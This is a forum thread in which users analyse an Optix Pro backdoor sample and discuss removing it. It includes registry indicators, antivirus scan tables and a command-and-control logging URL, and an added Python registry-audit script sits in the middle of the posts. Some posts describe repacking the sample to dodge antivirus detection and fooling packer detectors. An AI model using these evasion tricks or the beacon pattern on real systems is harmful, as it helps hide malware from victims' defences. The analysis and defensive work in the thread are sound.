Playing with trojans to learn

Discussion in 'malware problems & news' started by emir, Jun 25, 2006.

Thread Status:
Not open for further replies.
  1. emir

    emir Registered Member

    I have Deep Freeze to make sure the trojan is gone when I reboot, and AppDefend/RegDefend to see what it
    does on a general level. I have come across a problem I can't seem to figure out how to get around and was hoping
    someone could help me. I plan to do some sidework for friends and associates cleaning malware from computers.
    I thought maybe I could use the XP recovery console to replace an entire folder such as system32, which I see
    now was ignorant of me to assume, as this recovery console is only for recovery and not at all for repair.

    I have come across a trojan from the upload section of governmentsecurity.org that immediately kills Sygate and gains full ownership,
    in the sense that anything you do through Windows Explorer (which in essence is anything, period, on Windows) is run
    through this trojan, it being the parent process executing everything. This means that all calls to any program are
    executed through this program, which explains why it cannot be detected even with the best trojan or other malware
    removal programs, even run from read-only removable media, because once you attempt to execute it on your system
    it is always executed with this trojan being the parent process somehow. So I can rename the value of it in the registry
    and kill the process, but it creates a different strand of itself which is an MS-DOS program with the same name which won't
    allow you to delete it through regular means, and even if you can boot into safe mode and clean up, guess what: once you
    delete the initial file in the system32 folder, anything you attempt to run on your computer that normally would just run
    now asks what program you would like to open it up with, meaning you have lost all functionality basically on any program.

    So I am wanting to know if there are any other suggested methods short of re-formatting and re-installing Windows in case I come
    up against this sort of sophistication on a client's computer. The name of the trojan is isyst32win.exe and I can say it is on the
    3rd page of the trojan/virus upload section of the governmentsecurity.org forum under the title "mallware" and says it is undetected by
    Nod32, which comes as no surprise; it also is undetected by almost everything else as you will see:

    I think infected from P2P

    found in : %systemroot%\system32\isyst32win.exe
    Startup Method : Reg - Shell\Open (like sub7 & hidden to msconfig)
    Command Line : iwinsyst32.exe PASS "%1" %*
    AntiVirus : nod32
    AV Detected : Not yet but submitted (it may be packed)
    Solution : open regedit.exe then find iwinsyst32.exe PASS "%1" %* and change it to "%1" %*


    Attached File(s)
    isyst32win.zip ( 606.33k ) Number of downloads: 98



    320X Nov 9 2005, 01:11 AM
    Post #2




    It seems packed with Armadillo 1.xx - 2.xx -> Silicon Realms Toolworks [Overlay]



    320X Nov 9 2005, 01:26 AM
    Post #3




    AntiVir Found Backdoor-Server/Small.18.L
    ArcaVir Found nothing
    Avast Found nothing
    AVG Antivirus Found BackDoor.Small.18.L
    BitDefender Found nothing
    ClamAV Found nothing
    Dr.Web Found nothing
    F-Prot Antivirus Found W32/Backdoor.BGY
    Fortinet Found W32/OptixPro.L-bdr
    Kaspersky Anti-Virus Found nothing
    NOD32 Found nothing
    Norman Virus Control Found nothing
    UNA Found Backdoor.Optix.Pro.13
    VBA32 Found Backdoor.Win32.Optix.Pro.13



    kbnet Nov 9 2005, 04:03 AM
    Post #4




    Have you noticed that it's contacting:

    http://xx004.netfirms.com/cgi-bin/x3.cgi?action=log&ip=[...-...-...-...]&port=4455&id=SQLinject&win=repclient1&rpass=mex&connection=Optix_Pro_v1.33&s7pass=14567

    "[...-...-...-...]" - This was my ip address, just blanked it out.
    I will look into this in a bit! Intriguing.

    It's packed with Armadillo ver 2.



    LittleHacker Nov 9 2005, 04:48 AM
    Post #5




    That's exactly right kbnet.
    Just a few days ago I found a file in system32 with the same icon that was listening on port 4455 and had a startup method Reg:HKLM/Run.
    I killed the process and cleaned it from the reg, but it seems to rise again.
    So it may have had a 2nd process/thread that checks itself;
    it may be a polymorphic trojan ...

    btw I'm interested in how you determine the packer. I thought just crackers can do it. It seems there is a tool for it ...



    kbnet Nov 9 2005, 05:18 AM
    Post #6




    You don't need a tool to tell you what a file is packed with - although it can help. I determined it was
    Armadillo by quickly looking at the strings; I just opened the file in IDA.

    Here are the run keys:

    HKLM\Software\Microsoft\Windows\CurrentVersion\Run\erg45htree
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\erg45htree

    QUOTE
    it maybe a polymorphic trojan ...

    Very unlikely bud - what makes you say that anyway?

    QUOTE
    I thought just crackers can do it.

    Not at all m8.

    Did you know it also makes 2 copies of itself:

    /windows/system32/isyst32win.exe
    /windows/system32/msdoswinsyst32.exe



    ash^ Nov 9 2005, 08:57 AM
    Post #7




    QUOTE(LittleHacker @ Nov 9 2005, 09:48 AM)

    btw I'm interested in how you determine the packer. I thought just crackers can do it. It seems there is a tool for it ...


    Get a tool called PEiD; I think the website is hxxp://peid.tk. It's a nifty tool.



    lobas Nov 9 2005, 01:33 PM
    Post #8




    u can actually bypass peid easily-ish, and nod if u have nod32 detects APIs, erm u can fool them with NOP
    loops, peid changing ep rva base image base etc..





    kbnet Nov 10 2005, 01:55 AM
    Post #9




    QUOTE
    u can actually bypass peid easily-ish, and nod if u have nod32 detects APIs, erm u can fool them with NOP loops,
    peid changing ep rva base image base etc..


    Do you have any more info on this?



    the_mul3 Nov 13 2005, 02:53 PM
    Post #10




    QUOTE(ash^ @ Nov 9 2005, 01:57 PM)

    QUOTE(LittleHacker @ Nov 9 2005, 09:48 AM)

    btw I'm interested in how you determine the packer. I thought just crackers can do it. It seems there is a tool for it ...


    Get a tool called PEiD; I think the website is hxxp://peid.tk. It's a nifty tool.


    While yer there, check the forums for the custom packer sigs too.

    AFAIK there are no polymorphic trojans, only partly polymorphs like MoSucker and CIA.
    Donald Dick is the closest to a real polymorph, but only its dropper is that; the installed server is not.



    aiO Nov 13 2005, 03:29 PM
    Post #11




    QUOTE(LittleHacker @ Nov 9 2005, 09:48 AM)

    That's exactly right kbnet.
    Just a few days ago I found a file in system32 with the same icon that was listening on port 4455 and had a startup method Reg:HKLM/Run.
    I killed the process and cleaned it from the reg, but it seems to rise again.
    So it may have had a 2nd process/thread that checks itself;
    it may be a polymorphic trojan ...

    btw I'm interested in how you determine the packer. I thought just crackers can do it. It seems there is a tool for it ...

    lol, I don't get how a hacker gets owned by something like this



    the_mul3 Nov 14 2005, 11:51 AM
    Post #12




    QUOTE(aiO @ Nov 13 2005, 08:29 PM)

    lol, I don't get how a hacker gets owned by something like this



    I know, it's called social engineering



    LittleHacker Nov 15 2005, 05:19 AM
    Post #13




    QUOTE(kbnet @ Nov 9 2005, 11:18 AM)

    You don't need a tool to tell you what a file is packed with - although it can help. I determined it was
    Armadillo by quickly looking at the strings; I just opened the file in IDA.

    Thanks, good hint! I sometimes use edit.com, but IDA and maybe OllyDbg are better.


    QUOTE(kbnet @ Nov 9 2005, 11:18 AM)

    Here are the run keys:

    HKLM\Software\Microsoft\Windows\CurrentVersion\Run\erg45htree
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\erg45htree

    Run again and you may find something other than this.


    QUOTE(kbnet @ Nov 9 2005, 11:18 AM)

    Very unlikely bud - what makes you say that anyway?

    As I said, different startup methods is clear, but I don't know ...

    QUOTE(kbnet @ Nov 9 2005, 11:18 AM)

    Did you know it also makes 2 copies of itself:
    /windows/system32/isyst32win.exe
    /windows/system32/msdoswinsyst32.exe

    yes I've found it before ...



    fearstriker2 Nov 28 2005, 11:27 PM
    Post #14




    lol I packed it with Morphine and got:
    CODE
    File: isyst32.exe
    Status: INFECTED/MALWARE
    MD5 6b99d283653570c5cae58586b890ad69
    Packers detected: PE_PATCH.MORPHINE, MORPHINE, ARMADILLO
    Scanner results
    AntiVir Found Packer/Morphine
    ArcaVir Found nothing
    Avast Found nothing
    AVG Antivirus Found BackDoor.Small.18.L
    BitDefender Found Backdoor.Optix.H
    ClamAV Found nothing
    Dr.Web Found BackDoor.Optix.13
    F-Prot Antivirus Found nothing
    Fortinet Found nothing
    Kaspersky Anti-Virus Found Backdoor.Win32.Optix.Pro.s
    NOD32 Found Win32/Optix.Pro.S
    Norman Virus Control Found nothing
    UNA Found nothing
    VBA32 Found Backdoor.Win32.Optix.Pro.13


    Now it's detected by Nod32..lol




    Little_Dice Nov 29 2005, 01:35 AM
    Post #15




    I'm a little new at this but very interested.
    1. How did you find the process and know it was a virus?
    2. How did you find the registry keys?
    3. How did you know it was sending information to that website?
     
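As an added illustration (not code from the thread or from any of its posters), here is a Python audit of a .reg export that checks the exefile shell\open\command value against the stock "%1" %* and lists Run/RunServices entries, covering both the startup method in the quoted post and the run keys kbnet lists; the .reg text, the key names and the allowlist are constructed for the example.

```python
# Constructed .reg export (not from the thread's real system); the hijacked
# exefile command and the Run/RunServices names mirror what the posts describe.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="iwinsyst32.exe PASS \"%1\" %*"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"erg45htree"="C:\\WINDOWS\\system32\\isyst32win.exe"
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"erg45htree"="C:\\WINDOWS\\system32\\msdoswinsyst32.exe"
'''

EXEFILE_KEY = "HKEY_CLASSES_ROOT\\exefile\\shell\\open\\command"
EXPECTED_EXEFILE_CMD = '"%1" %*'  # stock XP value: launch the .exe itself
AUTORUN_SUFFIXES = ("\\CurrentVersion\\Run", "\\CurrentVersion\\RunServices")
KNOWN_GOOD = {"ctfmon.exe"}  # constructed allowlist; take yours from a clean baseline


def parse_reg(text):
    """Parse a .reg export into {key: {value_name: value}} (REG_SZ lines only)."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and "=" in line:
            name, _, val = line.partition("=")
            name = name if name == "@" else name.strip('"')
            if val.startswith('"') and val.endswith('"'):
                # .reg escapes embedded quotes and backslashes with a backslash
                val = val[1:-1].replace('\\"', '"').replace("\\\\", "\\")
            keys[current][name] = val
    return keys


def audit(keys):
    """Flag a non-stock exefile open command (the parent-process takeover the
    thread describes) and every autorun entry whose exe name is not allowlisted."""
    findings = []
    cmd = keys.get(EXEFILE_KEY, {}).get("@", "")
    if cmd.strip() != EXPECTED_EXEFILE_CMD:
        findings.append(("exefile_hijack", cmd))
    for key, values in keys.items():
        if key.endswith(AUTORUN_SUFFIXES):
            for name, val in values.items():
                if val.lower().rsplit("\\", 1)[-1] not in KNOWN_GOOD:
                    findings.append(("autorun", f"{key}\\{name} -> {val}"))
    return findings


def remediation_reg():
    """The fix the quoted post gives, as an importable .reg fragment: restore
    the exefile command to "%1" %* so programs launch directly again."""
    return (f"Windows Registry Editor Version 5.00\n\n[{EXEFILE_KEY}]\n"
            '@="\\"%1\\" %*"\n')


if __name__ == "__main__":
    print(audit(parse_reg(SAMPLE_REG)))
```

Run it against a real export with `regedit /e` output and the autorun findings become a review list, not an automatic delete.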
  2. aigle

    aigle Registered Member

    Very interesting and very, very scary - at least for me.
    What happens if u get it while in a sandbox?
     
  3. emir

    emir Registered Member

    Have not tested inside a sandbox, but this program has a way of gaining full ownership and killing a firewall such as Sygate in less than 20 seconds of execution and replicating itself also as an MS-DOS program. The only way I could keep it from doing anything it wanted to, like accessing its server, was with the high-quality low level protection that AppDefend/RegDefend provides. If you are curious though you should try with Deep-Freeze using your sandbox; I will try. What sandbox are you referring to? I would disconnect from the internet though before executing if you don't have AppDefend/RegDefend on your pc, because I have yet to believe there is a program exactly as efficient in every way. But let me know what sandbox to try and I will. I would really like to know how to get rid of it the most though.
     
  4. aigle

    aigle Registered Member

    I would like to try myself but I am very inexperienced. I am using GeSWall, so I will be excited to see how good GeSWall is in this regard.
    It will in fact be nice to play with it with Sandboxie, DefenceWall and BufferZone. I just want to see the real efficacy of these programmes. I will be thankful if u can test.
    It's too scary by the way. I wonder who has invented it?
     
  5. emir

    emir Registered Member

    I tested in the Sandboxie environment and it does absolutely nothing. The problem with this though is that you never know what it attempted to do; I mean when I say it did nothing I mean absolutely nothing. You never would know of its intentions or anything. I mean how will you know what programs to run out of this Sandboxie when a known nasty has been run in it and it tells you nothing about what it attempts to do? BufferZone requires a reboot to work properly, correct? Nothing survives a reboot with Deep Freeze so I cannot tell you about this program. I experienced strange behavior with this DefenceWall, like too much trying to contact its server and other things in the past, but nonetheless I will try them, even though neither is now listed on majorgeeks. I will maybe still do this tonight. I have yet to receive an answer on removal of this nasty if I encounter it on someone's PC that it has already infiltrated. Please, someone, anyone, for removal suggestions based on the info I supplied at the beginning of this post.
     
  6. aigle

    aigle Registered Member

    http://www.gentlesecurity.com/
    http://www.sandboxie.com/
    http://www.softsphere.com/


    All are trustable to me; the DefenceWall writer is a member here as well. Sandboxie is free and has a really nice forum as well; GeSWall support is also very responsive.
    Especially Sandboxie has a unique feature that it keeps all sandboxed things in a separate portion (virtual?) and all the contents of this sandbox can be deleted with a few clicks (a real nice feature that is absent in GeSWall and DefenceWall - actually they work in a different way I think).

    Thanks.
     
  7. aigle

    aigle Registered Member

    So any updates?
     
  8. emir

    emir Registered Member

    Like I had stated earlier, this Sandboxie apparently prevents the trojan from doing anything, but it never lets you know what the trojan attempted to do, so you never know what is a malicious program or not inside this Sandboxie; only once you run it outside will you know, and it is not detected by all but a couple of antivirus. To tell you the truth, if something gains full ownership and becomes the parent process to everything, then how would you overcome this with even the most sophisticated malware detection/removal program? Answer: you don't. So I am going to do some toying around with some more nasties today; I might post some info.
     
  9. TNT

    TNT Registered Member

    Is there an 'aftermath' in Sandboxie at all? If it runs in Sandboxie, you should at least do "Explore contents of sandbox" and see the files it created. Maybe it doesn't even start in Sandboxie at all (some trojans are 'smart' enough not to run at all when sandboxed).

    Try uploading it here http://www.cwsandbox.org (the results are mailed to you). The output is somewhat cryptic and it's not guaranteed to work inside THAT sandbox, but you should definitely try.
     
  10. aigle

    aigle Registered Member

    What is this CW sandbox?
     
  11. aigle

    aigle Registered Member

    In that case, can u pls upload it to Jotti and virus total and post the results here as many people will be interested to see the results. Thanks.
     
  12. TNT

    TNT Registered Member

    It's what it says.
     
  13. emir

    emir Registered Member

    I'm sorry, I have been busy playing with something even worse than this trojan. I also believe I figured out a way to entirely replace the system32 folder on a computer whose system32 folder doesn't even have some of the same dll's and other applications and drivers in its system32 folder as the other computer, which is not infected, that I take a copy of the system32 folder from. This is a breakthrough for me, as this folder is where, from what I can see, almost all malware no matter what its caliber has to drop its main components (usually dll's, sometimes exe's). This can mean I can fix a system and tie up any complications from incompatibility because of differences in these folders without having to re-install XP on a customer's computer who does not have a restore cd, built-in restore or the XP cd, if you know what I mean. (I cannot write what has to be done if all this criteria is unfortunately met.) It is nearly impossible to completely clean some of this stuff I am coming across lately; it's like it has evolved recently, it's like a horror movie. That's the only way I know how to describe it. I see that to take a huge swing at this new stuff floating around is to do this with the system32 folder, and then work your way around finding anything anywhere else it has dropped itself. I only have to separately deal with the SAM file and some event logs; of course this can be done. Anyway, I was reprimanded for posting the entire page of another website and, I think, for what administration I guess deemed as too lengthy of an explanation that was quoted from this site (governmentsecurity.org). So I will be back and explain this newest trojan, which seems to use Windows native API calls (I am too much of a newbie to explain right this second), which I have only seen in rootkit technologies until now.
     
  14. aigle

    aigle Registered Member

    So it is not possible to upload it to Jotti or VirusTotal? It will be good for antivirus vendors as well.
     
  15. Mrkvonic

    Mrkvonic Linux Systems Expert

    Hello,

    Why don't you do the usual way:

    Clean temporary files / cookies.
    Boot in safe and normal mode and repeat below

    Scan with several anti-virus programs.
    Scan with several anti-spyware programs.
    Scan with several anti-trojan programs.

    Post a hijack this log in a forum and ask for help.

    Are you really infected or just playing with malware?

    Mrk
     